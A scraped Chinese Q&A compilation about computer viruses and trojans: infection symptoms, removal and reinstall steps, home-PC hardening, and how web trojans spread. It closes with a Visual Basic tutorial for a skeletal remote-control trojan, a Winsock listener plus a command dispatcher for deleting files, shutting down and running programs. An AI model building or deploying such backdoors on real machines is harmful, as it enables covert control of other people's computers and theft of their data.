输入一段代码电脑瞬间变成伪黑客,一串代码变成黑客

导航：

• 1、电脑中病毒了会怎么样
• 2、家用电脑怎样防止黑客木马入侵？
• 3、主页被黑客加了一段代码
• 4、电影中黑客电脑刷新的代码
• 5、网站被黑客挂上木马病毒怎么办?

电脑中病毒了会怎么样

问题一：中病毒之后电脑会怎么样 1，各程序运行速度明显比平时慢

2，内存耗损严重，开启程序过多时例外。

3，鼠标不听指挥

4，不明程序在运行，且严重占用内存

5，点击一�窗口，同时打开很多一样的窗口

6，网络端口被不听刷新

7，操作系统总是出现运行错误

8，未被修改过的文件出现丢失或者已经被修改的提示

9，查找注册表内键值发现有陌生键值存在

10，信息显示，有用户试图登陆你的电脑

11，在DOS环境中，显示有PING命令在运行，并有数据包发送给你的电脑

12，电脑网络端口被扫描

13，电脑无故频繁重新启动

14，利用瑞星等杀毒软件杀毒时，发现病毒越杀越多

15，屏幕异常黑屏

16，有程序试图登陆网络

17，键盘失效，无法输入字符

18，某个文本文件被自动翻页

19，某个正在运行的程序被异常中断

20，防火墙提示有端口正被监听

21，屏幕被不停刷屏 问题二：电脑中病毒后会怎样？ 您好：如果怀疑系统存在病毒，建议您安装瑞星杀毒软件V16版本升级到最新病毒库后进行病毒扫描查杀，下载地址：pc.rising/

问题三：电脑中木马病毒被控制会怎么样？ 木马有很多种，破坏型、密码发送型、远程访问型、键盘记录木马、DoS 攻击木马、FTP木马、反弹端口型、代理木马、程序杀手木马等。即使你设置了访问控制权限，别人一样可以偷窥你的隐私。你可以使用木马检测工具，更新病毒库，同时加强自己的防护意识。当然，逼不得已你也可以选择以其人之道还治其人之身，呵呵

问题四：电脑中病毒会很卡吗？ 你好！

电脑系统中病毒后，有些病毒会很占用系统资源，导致电脑运行缓慢或是无法正常使用。

但有些病毒隐藏的较好，可能不会被轻易察觉，不会占用太多系统资源。

如果怀疑电脑中病毒，最好是使用杀毒软件进行全盘查杀。

问题五：电脑中病毒了怎么办？情况很严重！！高手指教！！！ 你重启电脑 在开机时按F8（断断续续 快速的按着） 然后进入一个黑体白字的界面 用键盘上的上下键选择到 一个叫“带网络连接的海全模式”回车 等会就进入一个黑白的安全桌面 。这时你再打开金山毒霸 全盘扫描 杀毒 然后再用360 优化你的电脑 清理垃圾 和不正常的插件 卸载不正常软件 系统修复一下。要是不是很会搞我可以帮你 方便远程就好 。

问题六：我的电脑是中病毒了吗？怎么解决了？ 这是在检测硬盘的，说明你的硬盘有太严重的问题才出现此现象，等检测完就可以进系统了。

建议：重新安装系统前把C盘格式化一下再装系统就可以了。

抱去电脑店装机需要30---50元，虽然钱不多但是麻烦，不如用30---50元买个U盘自己装系统，知识也学了机器也装了，主要是方便了，而且自己又落个U盘，呵呵，何乐而不为。

以下是用U盘装机流程，自己看看，学会不求人，而且自己更方便。

U盘装系统：是把U盘装个PE系统后，插在电脑上，可以用主板带动U盘启动，然后做系统用，主要是方便又可以更好的操作。

具体方法：去买个2.0U盘（3.0U盘要有驱动才行，装机会容易失败。），按下边的去做即可自己装系统了。

以下是U盘装机流程： 以大白菜pe或是老毛桃pe为例，都一样。

以下是U盘装机流程： 以大白菜为例

准备未储存文件的空U盘（建议使用8G以上U盘，注意：制作PE系统时会把U盘格式的）,下载大白菜U盘装机系统软件，如果自己的电脑可用，就在自己的电脑上把U盘装成PE系统，如果不好用到别的机器上制作成‘大白菜’PE安装软件的U盘，即可开始装机，把U盘插到电脑上后开机。

注意！此处很重要： U盘做好后首先要做的是: 电脑正常时或是到PE桌面时，要 备份电脑上重要文件，（主要有：桌面上的重要文件和我的文档里的重要文件，拷到D盘里。）然后开始执行以下事情：

注意！如果电脑内存是4GB以上，则必须选择64位系统版本，因为32位Win7系统最大只支持4GB内存。

建议你，重装系统前把C盘格式化一下再装系统可解决硬盘有逻辑坏道问题。

1，先把WINXP、 WIN 7或是WIN10镜像下载到硬盘里或是预先做个GHO文件保存在U盘里，然后在除C盘以外的盘或者U盘根目录里新建一个GHO文件夹，也可以在D盘根目录下建一个GHO文件夹，然后把WIN7镜像用UltarISO或者WinRAR解压释放到GHO文件夹中。

注意：切记注意不要在C盘中建GHO文件夹，那样会再安装过程中把GHO文件清掉而安装失败。

2，把启动U盘插在电脑上，然后开机：

如果是新式UEFI BIOS，一般可以直接按F12进入到快捷启动菜单，在菜单中选择U盘名称，即可从U盘启动。

如果是老式BIOS，那必须按Del或F2等进入BIOS，然后在Advanced BIOS Features项目下，或者Boot，或者Startup下，找到First Boot Device或1st Boot Device等，进入后把USB-HDD或U盘名称设为第一启动，

具体方法看主板的说明书，或到网上搜索。

启动U盘后，进入到这个U盘PE界面，选择“运行Windows PE(系统安装)”。

3，进入大白菜PE 或是老毛桃PE桌面后，选择WIN系统安装器这个桌面快捷图标，双击运行。

4，弹出NT6快捷安装器，首先就是要找到先前下载解压出来的系统文件，所以按“打开”按钮。

5，打开一个文件选择框，找到先前在D盘建立的GHO文件夹，然后找到其子文件夹Sources，然后再在Sources文件夹下找到install.wim这个文件，这个就是安装文件，选出好后按“打开”按钮。

6，然后选择安装分区，一般会默认为C盘，如果需要安装到其它盘，那就要手动调整，如果是新手，最好不要去调整它，因为系统分区必须是主分区，而且必须是激活的，所以，如果不了解这些，最好不要去碰这个。

7，在这里，弹出安装前最后一个确认窗口，仔细看一看，如果确定都选择好了，就可以点按“确定”，安装开始。

8，这时会将GHO中的系统文件复制到C......

问题七：如果电脑上有一个病毒 危害大吗 具有一般木马的功能，会对你的个人信息安全产生危害 木马程序一般分为服务器端程序和客户端程序两个部分，当服务器端程序安装在某台连接到网络的电脑后，就能使用客户端程序对其进行登陆。这和 PcAnywhere以及NetMeeting的远程控制功能相似。但不同的是，木马是非法取得对对方电脑的控制权，一旦登陆成功，就可以取得管理员级的权利，对方电脑上的资料、密码等是一览无余。不过这种木马一般的“伪黑客”很少使用，因为一不小心就会引火上身，被对方反查过来就会偷鸡不成蚀把米了，一般他们都会采用只有服务器端的小木马，这类木马通常会把截取的密码发到一个免费邮箱里，不需要人为操作，有空去收趟邮件就可以了，这种木马遍布互连网的各个角落，的确防不胜防，由于木马程序众多，加之不断有新版本、新品种产生，使得软件无法完全应付，所以手动检查清除是十分必要的。 在动手查杀熊猫烧香病毒之前，强烈建议先注意以下四点： 1.本文包含两种熊猫烧香病毒变种的描述，请注意查看病毒症状，根据实际情况选用不同的查杀方法。 2.对于被熊猫烧香病毒感染的.exe可执行文件，推荐先备份，再修复！ 3.找回被熊猫烧香病毒删除的ghost(.gho)文件，请使用EasyRecovery Pro。.gho文件所在分区进行的写操作越少，找回来的几率越大。 4.对计算机了解不多的用户，请在专家指导下清除熊猫烧香病毒。 熊猫烧香病毒变种一：病毒进程为“spoclsv.exe” 这是“熊猫烧香”早期变种之一，特别之处是“杀死杀毒软件”，最恶劣之处在于感染全盘.exe文件和删除.gho文件（Ghost的镜像文件）。 最有“灵感”的一招莫过于在所有htm/html/asp/php/jsp/aspx文件末尾添加一段代码来调用病毒。目前所有专杀工具及杀毒软件均不会修复此病毒行为。需要手动清除病毒添加的代码，且一定要清除。否则访问了有此代码的网页，又会感染。 其他老一点的“熊猫烧香”spoclsv变种的病毒行为比此版本少。就不再单独列出。 病毒描述： “武汉男生”，俗称“熊猫烧香”，这是一个感染型的蠕虫病毒，它能感染系统中exe，，pif，src，html，asp等文件，它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件，（.gho为GHOST的备份文件），使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。 1．消耗资源 所有计算机病毒都是程序，是程序，则在运行的时候都要占用系统资源。很多病毒都是驻留内存的，也就是说，它们会长期占用系统资源。这必然会造成系统的缓慢。即使是无害的病毒，也会有这个问题――因为它也是程序。这种危害看起来似乎不会造成什么损失，其实不然。1987年莫里斯编的蠕虫病毒，实际上不具有什么实质性的破坏作用，但它耗费了大量的系统资源，从而使系统极度缓慢直至停止运行。这样的损失实际上是时间的损失。现在，也有像I LOVE YOU这样的病毒，采用耗费系统或网络资源的方式作为破坏的一种手段。 2．干扰输出 在屏幕上显示图形或符号，或播放莫名其妙的音乐或声音。一般的无害病毒都有这项“功能”，这可能也是无害病毒的主要“攻击”手段了。这样的攻击手段通常不会带来什么实质性的破坏，但却会干扰你的工作。比如一个叫做“零臭虫”（Zero Bug）的病毒，在它进入内存后，会在屏幕上显示一个“臭虫”。这个“臭虫”会“吃掉”屏幕上所有的“O”字符。这个病毒不会使文件数据丢失，不过看一个没有“O”的屏幕是有相当......

问题八：电脑中病毒能修好吗? 5分 如果电脑中毒不死机，不蓝屏，只是反映慢，或其他不妨碍杀毒软件打开的，一般是可以快速有效的修好；如果电脑一中病毒死机，蓝屏，或开机报警，这种情况你小心了，你的硬盘内存条等很可能要报废了，如果你电脑里耽西不太重要，就不要害怕，只要花点钱将电脑里的东西换掉就行

问题九：电脑中病毒了.重装系统就能好吗 重装系统会首先格式化硬盘，电脑中毒后，如果将所有硬盘分区全部格式化再装系统，那么病毒就会 *** 掉了。

家用电脑怎样防止黑客木马入侵？

以下的文章主要讲述的是防范黑客入侵的四大宝典，说实话，自己每次出差之前，都要给家人和邻居们的计算机做一次全面检查。你或许会说，你这么做的是不是吃饱了撑着了啊！ 没错，我是吃饱了，但绝对不是撑的没事做，因为经常在外出差办事，接到家里打来的电话，通常都是三句：“中招了，电脑开不了了!”、“电脑现在好慢哦!怎么办啊？”第3句话基本上就是问我什么时候回来。能用电脑的人不一定会使用好，装了个杀毒软件就能防范所有病毒么？想抵御黑客攻击，靠防火墙软件就可以么？作为黑客，我不得不说，没那么简单，那么对于大多数人来说，应该做什么样的防范，才能把黑客、病毒、恶意软件统统关在门外呢？ 防范黑客入侵一、删除垃圾文件，把木马和病毒消灭在温床里 一般大家在浏览网站信息的时候，都会在本地机器上残留一些文件，而病毒也经常潜伏在里面，尤其是一些广告代码，恶意脚本和以及木马程序。这些文件集中在c盘的Documents and Settings文件夹下的子文件夹(你经常用的登陆帐号，例如admin，就是你在装机器的时候，填写的那个登陆帐户的名字)下面的local setting里面的temp文件夹。我们只要ctrl + A 全选之后，删除就可以了。 注意：local setting文件夹默认是隐藏属性，所以，你必须要让系统显示所有隐藏文件，这点我就不说怎么做了，我想大家都应该会。 防范黑客入侵二、关闭自动播放，避免间接感染 DC、DV以及mp3，mp4等娱乐休闲设备大兴其道的同时，也给我们本已脆弱的系统增加了几分凶险。很多人都是习惯性的将这些移动存储设备连接电脑后，直接传输文件、图片和视频，其实这个习惯很容易让你中招。曾经有一次，邻居的电脑发现双击打不开硬盘驱动器，弹出一个“选择打开方式”的对话框，其实是中了autoruan病毒。 这类病毒的传播媒介主要是移动存储设备，由于经常要在磁盘内交换数据，很有可能会感染病毒。很多人都知道硬盘有加密区，移动存储设备也一样有，用于存放设备及厂家标识信息的，而且都不大，几十K，最大也不超过几百K。有些病毒和恶意代码程序就是专门针对移动存储设备的加密区而写的，即使你把U盘格式化，他们也依然存在。 这无论对于个人还是企业，都有一定的威胁。据我所知，有些大公司和企业为了不让自己的机密信息通过U盘传播出去，就制定了不允许在公司内部使用U盘拷贝文件的规定。个人用户为了读取数据文件的方便，还是要使用移动存储设备的，那么我们怎么做才能把安全风险降到最低呢？ 关闭windows系统的自动播放服务，具体操作方法是：在运行里面，输入gpedit.msc，打开组策略，在用户配置下的管理模板中打开“系统”选项，在里面双击“关闭自动播放”，选择“已启用”，并选择“所有驱动器”，这样就可以关闭自动播放服务了。对于一些初级用户，如果想省事，使用大成的U盘免疫系统，也是不错的选择。 防范黑客入侵三、家用摄象头的安全隐患 个人隐私对于任何人来说，都是再重要不过的了，可是现在的黑客，为了money，可谓是无恶不作。如果你碰巧有个摄像头，又恰巧被人安装木马，键盘记录器等小工具，那么恭喜你，你的机器既成为了人家手中的肉鸡，又有可能通过你的摄像头掌握你一切的活动，甚至有些变态的在澡堂和换衣间安装针孔摄象头，来捕获一些信息出售了。 摄象头成本低廉，在电信、移动、网通这些 “吸血鬼”狂喝我们纳税人血液的时候，voip的诞生，网络通讯软件的广泛应用给我们省了不少money。但是同时也造成了一些安全隐患，在你同别人视频的时候，如果对方在你机器中下了有针对性的木马，那么你所有的活动都将收入人家的眼底。前些时候网上抄的很凶的视频泄密，是真实存在的，只要在木马中加一小段代码，就可以实现远程遥控的你摄像头。使用工具的伪“黑客”们可以捕获你和对方的谈话信息，捕获你的屏幕 ，甚至利用你的摄象头来监视你，这是绝对可以实现的，而且你还不知道。那你也许会问，把摄像头关了，不就可以了么？答案是否定的，同样在木马或病毒中加上一小段脚本，就可以远程开关你的摄像头，你在房间的一举一动都能看的清清楚楚。 有句话说的好，不怕贼偷就怕贼惦记。对家用摄像头带来的安全隐患，没有特别好的处理方法，通常都是聊天完毕，立即拔掉摄象头即可避免这样的情况。但对于彻夜不关机的懒人来说，就需要在睡觉的时候给摄像头盖上一块布，或者对着一盆花。 防范黑客入侵四、如何防止个人信息泄露 通常个人电脑中发生的密码泄露，游戏帐号泄露等事件都是病毒、木马以及恶意程序造成的，这些程序在你的电脑中植入小小的键盘记录器，来记录你的个人信息。在子明的黑客故事系列的第三篇，黑客窃取银行中就有对键盘记录器的详细介绍。 对付键盘记录器的一些个人建议：在输入密码时，前面先多做几次出错。在选择输入框的同时利用鼠标不断变换位置，尽量不要先输入头一位。现在网络银行和QQ登陆帐户都启用了软键盘功能，以前的软键盘输入之后，光标位置不变，而现在的就不错，每次打开输入一次，键盘上的字母和数字就会重新变换一次位置，这就造成了hook(钩子)的失效，那是不是这些黑客就无法破解了呢？答案是一定否定的，但是对于个人用户，这些是足够的了。 总结：个人用户在更新系统补丁的同时，一定要及时升级杀毒软件，不要以为杀毒软件能自动完成查杀，它也只能查杀病毒特征库中已知的病毒，对于那些黑客自己编写，尚未流通的病毒是无效的。最好的预防办法就是少一些好奇，尽量不要浏览不明网站和下载不明程序，尤其那些地址看上去非常怪异的，实在想浏览可以利用搜索引擎中的快照功能。 对于Emule ，vagaa等P2P软件，也要多加小心，因为这些软件也是更多病毒的温床。最重要的是多为自己增加几分网络安全意识，网络安全防范，防的不是别人，要防的其实是自己，少一些好奇，少一些无知，少一些贪欲，这才是你最好的防范。黑客想进门也不那么容易了。 备注：个人计算机的安全防护，有永远说不完的话题，不仅仅是子明介绍的这四个方面需要注意，其他地方也需要注意，比如，系统设置不当也会造成很严重后果。小编就有一次发现朋友的笔记本上所有系统帐户全开，而且共享文件夹多的吓人，这样怎么有安全可言？病毒和木马看了还不乐坏了。总之，个人计算机安全防范，最重要的还是子明那句话，增强个人安全意识，少一些好奇，多一些警觉。

主页被黑客加了一段代码

如果是主页的话 肯定被人入侵了 建议你先用雷客图查一下有没有脚本木马 再根据创建时间以及IIS的日志找出入侵的记录（如果不是高手 会留痕迹的） 如果留下IP的话 他就惨了 当然他也可能是通过同一台服务器上的别的网站入侵的 那就找管理员好了

电影中黑客电脑刷新的代码

不存在。在电影中出现的代码是处于虚构的代码，黑客电脑刷新是电影的节目效果，使用的代码在现实是不存在的，是不可以使用的。代码是程序员用开发工具所支持的语言写出来的源文件，是一组由字符、符号或信号码元以离散形式表示信息的明确的规则体系。

网站被黑客挂上木马病毒怎么办?

源码中查找可疑代码,删除

如何识别木马

识别木马有新招，希望这篇文章对你有所帮助。

一、经常看到有玩家说，在输入自己的帐号的时候通故意输错帐号和码。其实这种木马是最早期的木马程序。现在已经很少有编木马程序的程序员，还按照这种监听键盘记录的思路去编写木马程序。现在的木马程序已经发展到通过内存提取数据来获得用户的帐号和密码。大家都知道，不管是传奇还是任何一款程序。它都是有他所特有的数据的（包括玩家的帐号、密码，等级装备资料等等）。这些数据都是会通过本机与游戏服务器取得了验证以后，玩家的角色资料才会出现在玩家的面前。而这些数据在运行的时候都是存放在计算机的内存里面的。木马作者只需要在自己的程序里面加入条件语句就可以取得玩家真实的游戏帐号、密码、角色等级~~~~~，以我自己的计算机知识，这种语句的大概意思应该是：当游戏进程进入到让玩家选择角色的时候再从内存中提取最后一次的帐号、密码、角色等级等资料。也就是说，其实玩家之前所做的故意输错帐号或密码完全是浪费自己的表情、浪费自己的时间。

下边先来说一下木马是如何通过网页进入你的电脑的，相信大家都知道，现在有很多图片木马，EML和EXE木马，其中的图片木马其实很简单，就是把木马exe文件的文件头换成bmp文件的文件头，然后欺骗IE浏览器自动打开该文件，然后利用网页里的一段JAVASCRIPT小程序调用DEBUG把临时文件里的bmp文件还原成木马exe文件并拷贝到启动项里，接下来的事情很简单，你下次启动电脑的时候就是你噩梦的开始了，EML木马更是传播方便，把木马文件伪装成audio/x-wav声音文件，这样你接收到这封邮件的时候只要浏览一下，不需要你点任何连接，windows就会为你代劳自动播放这个他认为是wav的音乐文件，木马就这样轻松的进入你的电脑，这种木马还可以frame到网页里，只要打开网页，木马就会自动运行，另外还有一种方法，就是把木马exe编译到.JS文件里，然后在网页里调用，同样也可以无声无息的入侵你的电脑，这只是些简单的办法，还有远程控制和共享等等漏洞可以钻，知道这些，相信你已经对网页木马已经有了大概了解，

简单防治的方法：

开始-设置-控制面版-添加删除程序-windows安装程序-把附件里的windows scripting host去掉，然后打开Internet Explorer浏览器，点工具-Internet选项-安全-自定义级别，把里面的脚本的3个选项全部禁用，然后把“在中加载程序和文件”禁用，当然这只是简单的防治方法，不过可能影响一些网页的动态java效果，不过为了安全就牺牲一点啦，这样还可以预防一些恶意的网页炸弹和病毒，如果条件允许的话可以加装防火墙，再到微软的网站打些补丁，反正我所知道的网吧用的都是原始安装的windows，很不安全哦，还有尽量少在一些小网站下载一些程序，尤其是一些号称黑客工具的软件，小心盗不着别人自己先被盗了，当然，如果你执意要用的话，号被盗了也应该付出这个代价吧。还有，不要以为装了还原精灵就很安全，据我所知，一般网吧的还原精灵都只还原c:盘即系统区，所以只要木马直接感染你安装在别的盘里的游戏执行文件，你照样逃不掉的。

下边介绍一下木马和如何简单的检查一下是否中了木马。

木马程序一般分为服务器端程序和客户端程序两个部分，当服务器端程序安装在某台连接到网络的电脑后，就能使用客户端程序对其进行登陆。这和PcAnywhere以及NetMeeting的远程控制功能相似。但不同的是，木马是非法取得对对方电脑的控制权，一旦登陆成功，就可以取得管理员级的权利，对方电脑上的资料、密码等是一览无余。不过这种木马一般的“伪黑客”很少使用，因为一不小心就会引火上身，被对方反查过来就会偷鸡不成蚀把米了，一般他们都会采用只有服务器端的小木马，这类木马通常会把截取的密码发到一个免费邮箱里，不需要人为操作，有空去收趟邮件就可以了，这种木马遍布互连网的各个角落，的确防不胜防，由于木马程序众多，加之不断有新版本、新品种产生，使得软件无法完全应付，所以手动检查清除是十分必要的。

木马会想尽一切办法隐藏自己，别指望在任务管理器里看到他们的踪影，有些木马更是会和一些系统进程寄生在一起的，如著名的广外幽灵就是寄生在MsgSrv32.exe里；当然它也会悄无声息地启动，木马会在每次用户启动windows时自动装载服务端，Windows系统启动时自动加载应用程序的方法木马都会用上，如启动组、win.ini、system.ini、注册表等等都是木马藏身之地；下边简单说一下如何检查，点开始-运行，输入：

msconfig回车 就会打开系统配置实用程序，先点system.ini，看看shell=文件名，正确的文件名应该是“explorer.exe”，如果explorer.exe后边还跟有别的程序的话，就要好好检查这个程序了，然后点win.ini，“run=”和“load=”是可能加载“木马”程序的途径，一般情况下，它们的等号后面什么都没有，如果发现后面跟有路径与文件名不是你熟悉的启动文件，你的计算机就可能中上“木马”了，当然你也得看清楚，因为如“AOL木马”，它把自身伪装成command.exe文件，如果不注意可能不会发现它不是真正的系统启动文件；最后点“启动”，检查里面的启动项是不是有不熟悉的，如果你实在不清楚的话可以把他们全部取消，然后重新运行msconfig，看一下有没有取消的启动项重新被选中的，一般木马都会存在于内存中，（就是线程插入，然后隐藏进程的木马，DLL无进程木马就不会驻留在内存里面，我们在下一次中会讲到）所以发现你取消他的启动项就会自动添加上的，然后你就可以逐步添上你的输入法，音量控制，防火墙等软件的启动项了；还有一类木马，他是关联注册表的文件打开方式的，一般木马经常关联.exe，点开始-运行，输入：regedit回车，打开注册表编辑器，点第一条，也就是HKEY_CLASSES_ROOT，找到exefile，看一下\\exefile\\shell\\open\\command里面的默认键值是不是"%1" %* ，如果是一个程序路径的话就一定是中木马了，另外配合两种以上的杀毒软件也是必要的，另外在windows下木马一般很难清除，最后重新启动到dos环境下再进行查杀。

防木马程序、防火墙、及杀毒软件介绍：

1、木马克星： 专业的个人版木马查杀工具;近100%查杀各种类型木马!玩家推荐反木马品牌~!

2、绿鹰PC万能精灵2.91 ：专业的个人版木马查杀工具;近100%查杀各种类型木马!玩家推荐反木马品牌~!

3、Symantec AntiVirus：这个我就不用再介绍了吧，全球最大的杀毒软件！强力推荐8.1企业版。

4、天网防火墙2.51个人版:天网防火墙个人版在网络效率与系统安全上完全采用天网防火墙的设计思想，采用最底层的网络驱动隔绝，其作用层在网络硬件与Windows网络驱动之间，在黑客攻击数据接触Windows网络驱动之前将所有的攻击数据拦截，保护脆弱的Windows网络驱动不会崩溃

看看这个，是用VB编的木马程序

1.“特洛伊木马”有被称为BO， 是在美国一次黑客技术讨论会上由一个黑客组织推出的。它其实是一种客户机/服务器程序，其利用的原理就是：在本机直接启动运行的程序拥有与使用者相同的权限。因此如果能够启动服务器端（即被攻击的计算机）的服务器程序，就可以使用相应的客户端工具客户程序直接控制它了。下面来谈谈如何用VB来实现它。

使用VB建立两个程序，一个为客户端程序Client，一个为服务器端程序systry。

在Client工程中建立一个窗体，加载WinSock控件，称为tcpClient，协议选择TCP，再加入两个文本框，用以输入服务器的IP地址或服务器名，然后建立一个按钮，按下之后就可以对连接进行初始化了，代码如下：

Private Sub cmdConnect_Click()

If Len(Text1.Text) = 0 And Len(Text2.Text) = 0 Then

MsgBox ("请输入主机名或主机IP地址。")

Exit Sub

Else

If Len(Text1.Text) 0 Then

tcpClient.RemoteHost = Text1.Text

Else

tcpClient.RemoteHost = Text2.Text

End If

End If

tcpClient.Connect

Timer1.Enabled = True

End Sub

连接建立之后就可以使用DataArrival事件处理所收到的数据了。

连接建立之后就可以使用DataArrival事件处理所收到的数据了。

在服务器端systry工程也建立一个窗体，加载WinSock控件，称为tcpServer，协议选择TCP，在Form_Load事件中加入如下代码：

Private Sub Form_Load()

tcpServer.LocalPort = 1999

tcpServer.Listen

End Sub

准备应答客户端程序的请求连接，使用ConnectionRequest事件来应答户端程序的请求，代码如下：

Private Sub tcpServer_ConnectionRequest

(ByVal requestID As Long)

If tcpServer.State sckClosed Then

tcpServer.Close‘检查控件的 State 属性是否为关闭的。

End If ’如果不是，在接受新的连接之前先关闭此连接。

tcpServer.Accept requestID

End Sub

这样在客户端程序按下了连接按钮后，服务器端程序的ConnectionRequest事件被触发，执行了以上的代码。如果不出意外，连接就被建立起来了。

2. 建立连接后服务器端的程序通过DataArrival事件接收客户机端程序所发的指令运行既定的程序。如：把服务器端的驱动器名、目录名、文件名等传到客户机端，客户机端接收后用TreeView控件以树状的形式显示出来，浏览服务器端文件目录；强制关闭或重启服务器端的计算机；屏蔽任务栏窗口；屏蔽开始菜单；按照客户机端传过来的文件名或目录名，而删除它；屏蔽热启动键；运行服务器端的任何程序；还包括获取目标计算机屏幕图象、窗口及进程列表；激活、终止远端进程；打开、关闭、移动远端窗口；控制目标计算机鼠标的移动与动作；交换远端鼠标的左右键；在目标计算机模拟键盘输入，下载、上装文件；提取、创建、修改目标计算机系统注册表关键字；在远端屏幕上显示消息。DataArrival事件程序如下：

Private Sub tcpServer_DataArrival

(ByVal bytesTotal As Long)

Dim strData As String

Dim i As Long

Dim mKey As String

tcpServer.GetData strData

‘接收数据并存入strData

For i = 1 To Len(strData)

‘分离strData中的命令

If Mid(strData, i, 1) = "@" Then

mKey = Left(strData, i - 1)

‘把命令ID号存入mKey

‘把命令参数存入strData

strData = Right(strData, Len(strData) - i)

Exit For

End If

Next i

Select Case Val(mKey)

Case 1

‘驱动器名、目录名、文件名

Case 2

强制关闭服务器端的计算机

Case 3

强制重启服务器端的计算机

Case 4

屏蔽任务栏窗口；

Case 5

屏蔽开始菜单；

Case 6

按照客户机端传过来的文件名或目录名，而删除它；

Case 7

屏蔽热启动键；

Case 8

运行服务器端的任何程序

End Select

End Sub

详细程序略。

客户机端用tcpClient.SendData发命令。命令包括命令ID和命令参数，它们用符号“@”隔开。

另外，当客户机端断开与服务器端的来接后，服务器端应用tcpServer_Close事件，来继续准备接收客户机端的请求，其代码如下：

Private Sub tcpServer_Close()

tcpServer.Close

tcpServer.Listen

End Sub

这就是一个最基本的特洛伊木马程序，只要你的机器运行了服务器端程序，那别人就可以在千里之外控制你的计算机。至于如何让服务器端程序运行就要发挥你的聪明才智了，在我的源程序中有一中方法，是修改系统注册表的方法。

这就是一个最基本的特洛伊木马程序，只要你的机器运行了服务器端程序，那别人就可以在千里之外控制你的计算机。至于如何让服务器端程序运行就要发挥你的聪明才智了，在我的源程序中有一中方法，是修改系统注册表的方法。

成功的特洛伊木马程序要比这个复杂一些，还有程序的隐藏、自动复制、传播等问题要解决。警告：千万不要用BO程序破坏别人的系统。